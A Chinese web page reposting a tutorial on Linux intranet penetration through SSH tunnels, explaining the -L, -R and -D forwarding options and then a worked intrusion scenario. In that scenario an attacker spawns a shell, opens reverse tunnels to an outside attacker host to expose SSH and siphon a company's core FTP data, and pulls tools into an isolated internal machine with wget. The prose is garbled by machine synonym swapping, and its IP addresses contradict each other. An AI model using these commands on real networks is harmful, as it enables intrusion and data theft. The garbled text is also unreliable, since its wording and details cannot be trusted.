|
|
|
联系客服020-83701501

linux内网渗透

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
linux内网渗透

在渗透测试过程中,常常遇到下列情景,内部网络主机经过路由器或许保险设备做了访问管制,无法经过互联网间接访问本地开放的任事,Windows方 面,外洋个别选择Lcx.exe来截至端口转发,在操作方面大少数人也会选择reDuh来截至端口转发,而*nix却很少人用零碎自带的ssh、 iptables本身来处置惩罚此类题目。
因为工夫无限,本文只详细的介绍ssh tunnel方面的常识,iptables的有空在加之。

SSH的三个端口转发命令:
ssh -C -f -N -g -L listen_port:DST_Host:DST_port user@Tunnel_Host
ssh -C -f -N -g -R listen_port:DST_Host:DST_port user@Tunnel_Host
ssh -C -f -N -g -D listen_port user@Tunnel_Host

-f Fork into background after authentication.
布景认证用户/密码,个别和-N连用,不用登录到长途主机。

-p port Connect to this port. Server must be on the same port.
被登录的ssd任事器的sshd任事端口。

-L port:host:hostport
将本地机(客户机)的某个端口转发到远端指定机械的指定端口. 使命情理是何等的, 本地机械上调配了1个 socket 侦听 port 端口, 1旦这个端口上有了毗连, 该毗连就颠末保险通道转收归去, 同时长途主机和 host 的 hostport 端口树立创立毗连. 大约在配置文件中指定端口的转发. 只有 root 才具转发特权端口. IPv6 地点用另1种式子阐明: port/host/hostport

-R port:host:hostport
将长途主机(任事器)的某个端口转发到本地端指定机械的指定端口. 使命情理是何等的, 长途主机上调配了1个 socket 侦听 port 端口, 1旦这个端口上有了毗连, 该毗连就颠末保险通道转向出去, 同时本地主机和 host 的 hostport 端口树立创立毗连. 大约在配置文件中指定端口的转发. 只无效 root 登录长途主机才具转发特权端口. IPv6 地点用另1种式子阐明: port/host/hostport

-D port
指定1个本地机械 “音讯的’’ 操作步伐端口转发. 使命情理是何等的, 本地机械上调配了1个 socket 侦听 port 端口, 1旦这个端口上有了毗连, 该毗连就颠末保险通道转收归去, 依据操作步伐的协议大约武断出长途主机将和那边毗连. 目前支持 SOCKS4 协议, 将充当 SOCKS4 任事器. 只有 root 才具转发特权端口. 大约在配置文件中指定音讯端口的转发.

-C Enable compression.
膨胀数据传输。

-N Do not execute a shell or command.
不实验剧本或命令,个别与-f连用。

-g Allow remote hosts to connect to forwarded ports.
在-L/-R/-D参数中,应允长途主机毗连到树立创立的转发的端口,假设不加这个参数,只应允本地主机树立创立毗连。注:这个参数我在实践中仿佛一直不起作用)

假设想要理解更多关于SSH的细节,大约 man ssh ,或参照ssh的DOC.

实例:
——————————————————————————
当骇客A从互联网入侵了RISUN企业的1台任事器,机械称呼为 GBOSS_WEB
GBOSS_WEB 音讯:
外网IP:255.25.55.111
内网IP:10.168.0.10
网络架构行动为,路由将外网256.25.56.111的80端口照耀到内网10.168.0.10的80端口上。

骇客A经过利用80端口开听任事的WEB剧本漏洞,成功承袭到GBOSS_WEB的httpd权限,尔后经过perl或许其余说话建立SOCKET 获得1个长途sh shell。因为back回来的shell可能不稳定,或许垄断起来不不便,大约驳回SSH树立创立1个单纯,将GBOSS_WEB任事器上的22端口照耀至 骇客的本机上(本文章用于演示的骇客机为0x.cn);

经过获得的sh shell,实验 $python -c ‘import pty; pty.spawn(”/bin/sh”)’ 获得1个ttyshell(因为ssh想要tty的支持),尔后经过下列命令,照耀GBOSS_WEB任事器的22端口至202.65.208.142的 44端口;
$ssh -C -f -N -g -R 44:127.0.0.1:22 ring04h@202.65.208.142
何等登录0x.cn的ssh任事,ssh -p 44 127.0.0.1 等同于毗连GBOSS_WEB的22端口。

骇客A经过利用利用零碎系统提升权限至ROOT,再继续渗透过程中,创作发明内网还存在其余1台称呼为GBOSS_APP的任事器。
GBOSS_APP 音讯:
内网IP:10.168.0.20

骇客经过嗅探获得了GBOSS_APP任事器的FTP音讯,GBOSS_APP任事器FTP保留有RISUN企业的核心数据,因为数据量宏壮,需要FTP续传遵命,可经过SSH照耀GBOSS_APP的21端口至0x.cn的2121端口;
$ssh -C -f -N -g -R 2121:10.168.0.20:21 ring04h@202.65.208.142

当骇客成功root掉内网中另1网段中的任事器BILL_APP时,需要从外网下载1些工具,因为内部访问管制战略,BILL_APP无法毗连网, 此时大约经过照耀外网任事器0x.cn的80端口至GBOSS_WEB的8888端口,尔后经过GBOSS_WEB树立创立的单纯,下载所需工具。
在GBOSS_WEB任事器上实验:
$ssh -C -f -N -g user@10.168.0.10 -L 8888:202.65.208.142:80

经过树立创立单纯后,在BILL_APP上实验 wget http://10.168.0.10:8888/thepl 等同于访http://202.65.208.142/thepl

本文详细的概述了若何树立创立单纯的过程,以及关系参数的垄断动作,列位懂的能手大约间接飘过。

本文摘自摆渡博客由网络保险攻防钻研室(www.91ri.org) 音讯保险小组收集整顿.转载本文请闻名原文地点及原作者版权音讯。

数安新闻+更多

证书相关+更多